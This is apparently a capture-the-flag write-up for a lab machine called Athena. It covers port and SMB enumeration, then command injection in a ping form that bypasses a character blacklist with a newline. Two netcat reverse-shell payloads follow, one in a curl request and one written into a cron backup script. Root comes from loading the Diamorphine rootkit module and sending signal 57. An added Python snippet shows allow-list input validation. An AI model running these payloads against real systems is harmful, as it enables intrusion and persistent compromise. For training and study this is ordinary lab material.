Port scanning

nmap --min-rate=10000 -p- 10.10.114.27
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:22 UTC
Nmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)
Host is up (0.0084s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:AB:07:41:29:CF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.13 seconds
nmap -sV -sT -sC -O -p22,80,139,445 10.10.114.27
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:23 UTC
Nmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3bc8f813e0cb42600df64cdc55d83bed (RSA)
| 256 1f42e1c3a5172a38693e9b736dcd5633 (ECDSA)
|_ 256 7a67598d37c56729e853e81edfb0c71e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Athena - Gods of olympus
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 02:AB:07:41:29:CF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ROUTERPANEL, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-12-26T14:23:24
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

SMB

smbmap -H 10.10.114.27
[+] IP: 10.10.114.27:445 Name: ip-10-10-114-27.eu-west-1.compute.internal
Disk Permissions Comment
---- ----------- -------
public READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.15.13-Ubuntu)

There is a readable share containing a small note. It reveals that a /myrouterpanel directory exists.

Getshell

The page is used for pinging, and it can indeed ping the Kali host, so let's check for command execution. Characters such as "," and "&" are blacklisted, so use a newline (%0A) instead. Set up a reverse shell.

curl http://10.10.114.27/myrouterpanel/ping.php -X POST -d 'ip=%0A nc -e /bin/bash 10.11.38.245 444 &submit='
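The blacklist on the ping form is defeated above because a newline is not on its list. As an added example (not code from the original writeup or the room), here is the allow-list check a defender would use for such an endpoint, beside a hypothetical blacklist check in the same style that shows why it fails:

```python
import ipaddress
from typing import List, Optional

# Hypothetical blacklist in the style the writeup describes: a handful of
# shell metacharacters are rejected, but a newline is not on the list.
BLACKLISTED_CHARS = {",", '"', "&", ";", "|", "`"}


def blacklist_allows(value: str) -> bool:
    """Blacklist-style filter: True if none of the listed characters occur."""
    return not any(ch in value for ch in BLACKLISTED_CHARS)


def validate_ping_target(value: str) -> Optional[str]:
    """Allow-list validation: accept only a literal IPv4/IPv6 address.

    Returns the normalised address string, or None for anything else.
    Nothing is stripped, so a trailing newline or space is a rejection,
    not something that slips through.
    """
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def build_ping_argv(value: str) -> Optional[List[str]]:
    """Build an argv list for ping from validated input.

    The target is an already-validated IP literal, so it cannot start with
    '-' or contain whitespace or metacharacters; passing this list to
    subprocess.run() without shell=True leaves no shell to inject into.
    """
    target = validate_ping_target(value)
    if target is None:
        return None
    return ["ping", "-c", "3", target]


if __name__ == "__main__":
    # Constructed inputs: a normal address and the newline trick from the page.
    for sample in ["10.10.114.27", "10.10.114.27\n id"]:
        print(repr(sample), "blacklist:", blacklist_allows(sample),
              "allow-list:", validate_ping_target(sample))
```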

Running pspy shows /usr/share/backup/backup.sh being executed periodically as the user athena.

And we have write permission on it, so write a reverse shell into it and start a listener.

echo '#!/bin/bash'>/usr/share/backup/backup.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.38.245 443 >/tmp/f'>>/usr/share/backup/backup.sh

Now we are athena. Do an ssh-keygen.

Privilege escalation

sudo -l shows that the following can be run without a password: /usr/sbin/insmod /mnt/…/secret/venom.ko

This loads a kernel module into the Linux kernel.

We can first start a web server on the target to download this kernel module file and reverse it in IDA.

It contains a function named diamorphine; Diamorphine is a rootkit (malware that hides inside the kernel).

Decompiling it in IDA shows a give_root function, which is called from hack_kill.

Sending signal 57 to any process grants root.

After running the sudo command, run:

kill -57 pid (any pid will do)

Now we are root.

Afterthoughts

Damn, half of the writeup was lost because it wasn't saved, so I rewrote it from scratch (annoying). The only unfamiliar parts were the rootkit and the kernel stuff at the end; once you look into them they are actually quite simple, and the reversing isn't hard either.